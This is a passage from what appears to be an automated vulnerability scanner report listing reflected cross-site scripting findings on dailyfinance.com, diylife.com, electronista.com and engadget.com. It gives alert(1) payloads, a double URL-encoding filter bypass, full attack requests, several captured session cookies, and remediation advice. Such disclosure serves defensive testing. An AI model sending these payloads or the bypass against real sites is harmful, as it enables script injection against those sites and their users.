The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0d3c"><img%20src%3da%20onerror%3dalert(1)>ac470910a2d was submitted in the REST URL parameter 2. This input was echoed as d0d3c"><img src=a onerror=alert(1)>ac470910a2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/peter-cohand0d3c"><img%20src%3da%20onerror%3dalert(1)>ac470910a2d/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Peter Cohand0d3c"><img Src=a Onerror=alert(1)>ac470910a2d" /> ...[SNIP]...
1.522. http://www.dailyfinance.com/writers/peter-cohan/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /writers/peter-cohan/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85a2b"-alert(1)-"9b924732f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/peter-cohan/?85a2b"-alert(1)-"9b924732f25=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e970%2522%253bcf72074392b was submitted in the REST URL parameter 2. This input was echoed as 1e970";cf72074392b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/trey-thoelcke1e970%2522%253bcf72074392b/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc12"><img%20src%3da%20onerror%3dalert(1)>d2cbddcc6eb was submitted in the REST URL parameter 2. This input was echoed as bdc12"><img src=a onerror=alert(1)>d2cbddcc6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/trey-thoelckebdc12"><img%20src%3da%20onerror%3dalert(1)>d2cbddcc6eb/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Trey Thoelckebdc12"><img Src=a Onerror=alert(1)>d2cbddcc6eb" /> ...[SNIP]...
1.525. http://www.dailyfinance.com/writers/trey-thoelcke/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/trey-thoelcke/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b60f7"-alert(1)-"15da3f4608d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/trey-thoelcke/?b60f7"-alert(1)-"15da3f4608d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8831"><img%20src%3da%20onerror%3dalert(1)>2b86e280064 was submitted in the REST URL parameter 2. This input was echoed as f8831"><img src=a onerror=alert(1)>2b86e280064 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/vishesh-kumarf8831"><img%20src%3da%20onerror%3dalert(1)>2b86e280064/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e2a4%2522%253bdbc3b5880ba was submitted in the REST URL parameter 2. This input was echoed as 8e2a4";dbc3b5880ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/vishesh-kumar8e2a4%2522%253bdbc3b5880ba/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.528. http://www.dailyfinance.com/writers/vishesh-kumar/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/vishesh-kumar/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8b0"-alert(1)-"6b18a4cc84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/vishesh-kumar/?5e8b0"-alert(1)-"6b18a4cc84=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.529. http://www.diylife.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.diylife.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa1b"><script>alert(1)</script>b58f3f3dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2aa1b"><script>alert(1)</script>b58f3f3dd35=1 HTTP/1.1
Host: www.diylife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe916%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e2e3f945f0 was submitted in the REST URL parameter 2. This input was echoed as fe916</script><script>alert(1)</script>1e2e3f945f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/eric-stromerfe916%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e2e3f945f0/ HTTP/1.1
Host: www.diylife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9b1"><a>fb26dfa8dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/eric-stromerbb9b1"><a>fb26dfa8dbc/ HTTP/1.1
Host: www.diylife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.diylife.com/category/eric-stromerbb9b1"><a>fb26dfa8dbc/" /> ...[SNIP]...
1.532. http://www.diylife.com/category/eric-stromer/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.diylife.com
Path:
/category/eric-stromer/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc76"><script>alert(1)</script>01ea18791e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/eric-stromer/?8cc76"><script>alert(1)</script>01ea18791e1=1 HTTP/1.1
Host: www.diylife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.diylife.com/category/eric-stromer/?8cc76"><script>alert(1)</script>01ea18791e1=1" /> ...[SNIP]...
1.533. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c13"><script>alert(1)</script>c3b351ab889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13"><script>alert(1)</script>c3b351ab889=1 HTTP/1.1
Host: www.electronista.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:18:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=cr8gnmkqgso7u33b1r7ihqkr51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 77779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e42f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9716d68035d was submitted in the REST URL parameter 2. This input was echoed as e42f9\"><script>alert(1)</script>9716d68035d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/7+mozarte42f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9716d68035d HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bc37%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7c9a6c534 was submitted in the REST URL parameter 2. This input was echoed as 3bc37<script>alert(1)</script>bd7c9a6c534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/7+mozart3bc37%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7c9a6c534 HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79d52%253cscript%253ealert%25281%2529%253c%252fscript%253eb2672f1bfe6 was submitted in the REST URL parameter 2. This input was echoed as 79d52<script>alert(1)</script>b2672f1bfe6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/FaceTime79d52%253cscript%253ealert%25281%2529%253c%252fscript%253eb2672f1bfe6/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 569f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68d40aa1dc3 was submitted in the REST URL parameter 2. This input was echoed as 569f1\"><script>alert(1)</script>68d40aa1dc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/FaceTime569f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68d40aa1dc3/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3c1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ef4e263330 was submitted in the REST URL parameter 2. This input was echoed as 3c3c1\"><script>alert(1)</script>2ef4e263330 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Fring3c3c1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ef4e263330/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fcef%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1ce691a6a was submitted in the REST URL parameter 2. This input was echoed as 9fcef<script>alert(1)</script>cb1ce691a6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/Fring9fcef%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1ce691a6a/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ff3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01f5ed27f96 was submitted in the REST URL parameter 2. This input was echoed as c5ff3\"><script>alert(1)</script>01f5ed27f96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/GoogleTVc5ff3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01f5ed27f96/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59ef9%253cscript%253ealert%25281%2529%253c%252fscript%253e9f8ff1f0b39 was submitted in the REST URL parameter 2. This input was echoed as 59ef9<script>alert(1)</script>9f8ff1f0b39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/GoogleTV59ef9%253cscript%253ealert%25281%2529%253c%252fscript%253e9f8ff1f0b39/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcec8c83ea4 was submitted in the REST URL parameter 2. This input was echoed as d8096\"><script>alert(1)</script>dcec8c83ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/ScreenGrabsd8096%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcec8c83ea4/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48cd7%253cscript%253ealert%25281%2529%253c%252fscript%253e9f4b3512041 was submitted in the REST URL parameter 2. This input was echoed as 48cd7<script>alert(1)</script>9f4b3512041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/ScreenGrabs48cd7%253cscript%253ealert%25281%2529%253c%252fscript%253e9f4b3512041/ HTTP/1.1
Host: www.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74867%253cscript%253ealert%25281%2529%253c%252fscript%253e792e0f3d945 was submitted in the REST URL parameter 2. This input was echoed as 74867<script>alert(1)</script>792e0f3d945 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
